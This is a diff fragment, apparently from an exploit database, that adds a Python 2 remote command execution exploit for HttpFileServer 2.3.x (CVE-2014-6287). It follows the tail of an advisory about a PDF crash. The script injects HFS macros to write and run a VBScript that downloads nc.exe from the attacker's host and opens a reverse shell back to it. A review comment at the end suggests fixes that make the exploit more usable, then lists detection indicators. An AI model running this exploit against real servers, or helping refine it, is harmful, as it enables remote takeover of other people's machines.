+While the sample crashes on a memory read operation in AddressSanitizer, an out-of-bounds "write" takes place subsequently in the same method, leading to a stack-based buffer overflow condition.
+
+The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551460. Attached is the PDF file which triggers the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39165.zip
+
diff --git a/platforms/windows/remote/39161.py b/platforms/windows/remote/39161.py
new file mode 100755
index 000000000..41b5a545b
--- /dev/null
+++ b/platforms/windows/remote/39161.py
@@ -0,0 +1,47 @@
+#!/usr/bin/python
+# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
+# Google Dork: intext:"httpfileserver 2.3"
+# Date: 04-01-2016
+# Remote: Yes
+# Exploit Author: Avinash Kumar Thapa aka "-Acid"
+# Vendor Homepage: http://rejetto.com/
+# Software Link: http://sourceforge.net/projects/hfs/
+# Version: 2.3.x
+# Tested on: Windows Server 2008 , Windows 8, Windows 7
+# CVE : CVE-2014-6287
+# Description: You can use HFS (HTTP File Server) to send and receive files.
+# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
+# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.
+
+#Usage : python Exploit.py
+
+
+import urllib2
+import sys
+
+try:
+ def script_create():
+ urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
+
+ def execute_script():
+ urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
+
+ def nc_run():
+ urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
+
+ ip_addr = "192.168.44.128" #local IP address
+ local_port = "443" # Local Port number
+ vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
+ save= "save|" + vbs
+ vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
+ exe= "exec|"+vbs2
+ vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
+ exe1= "exec|"+vbs3
+ script_create()
+ execute_script()
+ nc_run()
+except:
+ print """[.]Something went wrong..!
+ Usage is :[.] python exploit.py
+ Don't forgot to change the Local IP address and Port number on the script"""
+
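Review bot: The bare `except:` at the end of 39161.py catches everything — a missing `sys.argv[1]`/`sys.argv[2]` (IndexError), a refused or timed-out connection (`urllib2.URLError`), even KeyboardInterrupt — and reports all of them with the same generic message, so the real cause is never shown; narrow it to `except (IndexError, urllib2.URLError) as e:` and include `e` in the output, and check `len(sys.argv)` up front rather than relying on the exception for argument validation. Neither usage line (`#Usage : python Exploit.py` in the header, `Usage is :[.] python exploit.py` in the handler) names the two positional arguments the script actually reads, so they should be documented as `<host> <port>` next to the hard-coded `ip_addr`/`local_port` the comment tells the user to change. The three `def`s sit inside the `try:` and read `save`, `exe` and `exe1`, which are only assigned further down the block, so the code works purely by call order; a short comment saying so, or moving the assignments above the defs, would make that explicit. The `"C:\Users\Public\script.vbs|..."` literal relies on Python 2 byte-string semantics (where `\U` is not an escape), and together with `urllib2` this pins the script to Python 2, which the header should state. From a defender's side the hunk already shows the artefacts worth monitoring for: the `/?search=%00{.+...+.}` macro injection in the HFS request line (CVE-2014-6287) and the files written under `C:\Users\Public\`, which HFS access logs and endpoint file monitoring should be checked against.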